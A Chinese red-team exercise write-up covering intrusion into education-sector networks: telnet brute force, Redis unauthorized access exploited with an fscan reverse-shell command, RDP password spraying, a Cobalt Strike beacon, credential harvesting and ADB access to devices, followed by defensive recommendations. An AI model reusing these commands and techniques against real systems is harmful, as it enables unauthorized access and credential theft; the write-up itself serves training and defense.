记一次EDU攻防演练
字数 1656 2025-08-06 23:10:31
EDU攻防演练技术总结与教学文档
0x00 背景与概述
本次EDU攻防演练是一次针对教育行业的网络安全实战演练,主要特点包括:
- 目标系统多为教育行业网络
- 部分目标系统与前期演练有重合
- 目标资产中大量视频监控系统
- 采用混战模式,队伍间竞争
0x01 信息收集阶段
1.1 初始信息收集
- 使用fscan进行快速资产识别
- 发现内网地址泄露(记录备用)
- 使用超级弱口令检测工具扫描
1.2 突破口发现
- 通过telnet爆破获取H3C设备管理员权限
- 设备功能分析:
- 具备SSL VPN功能
- 有授权许可
- 可用于内网穿透
1.3 设备配置尝试
- 尝试通过命令行配置SSL VPN失败(设备过老)
- Web界面配置尝试失败
- 确认设备型号并查找手册
1.4 网络拓扑探测
- 通过设备路由表确认2、3、5、6网段
- telnet探测各网段特征:
- 2网段:服务器
- 3网段:未知
- 5网段:服务器+无线AP
0x02 突破口获取
2.1 无线AP利用
- 获取5网段无线AP权限
- 可用命令:ifconfig、ps -aux
- 受限命令:其他命令被屏蔽
- Web界面功能有限
2.2 替代方案实施
- 探测内网脆弱端口:22、1433、3389、6379、7001
- 采用NAT端口映射策略:
- 在路由器上探测内网端口
- 发现开放端口后建立NAT映射
- 通过公网访问映射端口
2.3 Redis未授权访问利用
- 发现6379端口Redis服务
- 确认未授权访问漏洞
- 使用fscan进行利用:
fscan_amd64.exe -h *.*.*.* -p 6379 -rs *.*.*.*:1234 - 通过计划任务获取反弹shell
0x03 内网横向移动
3.1 初始立足点巩固
- 使用fscan进行内网扫描:
fscan_amd64.exe -h *.*.*.*/16 -pa 3389 -pwd ***** -np - 成功爆破两台机器RDP密码
3.2 权限提升与信息收集
- 部署向日葵RCE(仅一台成功)
- PowerShell上线Cobalt Strike
- 收集信息:
- 文件系统敏感信息
- 浏览器保存密码
- 管理员IP(通过日志分析)
- 数据库账号
3.3 网络设备控制
- 通过浏览器保存密码访问上网行为管理后台
- 使用相同密码成功登录8台交换机
- 确认网络设备分数上限2000分
3.4 移动终端发现
- 使用kscan扫描发现移动终端设备
- 通过ADB连接约60台设备
- 确认物联网设备分数上限
0x04 技术总结与反思
4.1 成功经验
- 多工具组合使用(fscan、超级弱口令检测、kscan)
- 灵活调整策略(从SSL VPN转向端口映射)
- 坚持探测最终发现Redis漏洞
- 密码复用策略有效(交换机控制)
4.2 不足与改进
- 外网信息收集可更全面
- 团队协作需加强(目标选择、信息同步)
- 内网横向能力待提升
- 免杀和AV绕过技术需加强
- 时间管理需优化(避免在单一突破点耗时过长)
4.3 关键建议
- 外网打点:信息收集要宽泛仔细
- 团队协作:及时沟通,共享思路
- 灵活应变:单一方法受阻时及时调整策略
- 工具准备:提前准备好各类扫描、爆破工具
- 日志分析:重视系统日志中的管理员活动记录
0x05 工具与技术清单
5.1 使用工具
- fscan:综合扫描工具
- 超级弱口令检测工具:弱口令爆破
- kscan:端口和服务识别
- Cobalt Strike:C2框架
- 向日葵RCE:远程控制利用
- ADB:移动设备连接
5.2 利用漏洞类型
- 弱口令/Telnet爆破
- Redis未授权访问
- 向日葵RCE
- 密码复用漏洞
- 内网服务暴露(NAT映射)
5.3 防御规避技术
- NAT映射隐藏真实攻击路径
- 计划任务持久化
- PowerShell内存加载
0x06 防御建议
6.1 针对EDU系统的防护
-
网络设备:
- 禁用默认/弱密码
- 关闭不必要的Telnet服务
- 及时更新老旧设备
-
服务器:
- Redis等服务配置认证
- 关闭不必要的端口
- 限制管理接口访问
-
终端设备:
- 更改默认ADB配置
- 更新远程管理软件补丁
6.2 安全监控建议
- 异常登录检测(尤其是Telnet/RDP)
- Redis等服务的未授权访问尝试
- 内网到外网的异常连接
- 计划任务异常创建
6.3 安全加固措施
- 网络分段隔离
- 密码策略强化
- 最小权限原则
- 定期漏洞扫描与修复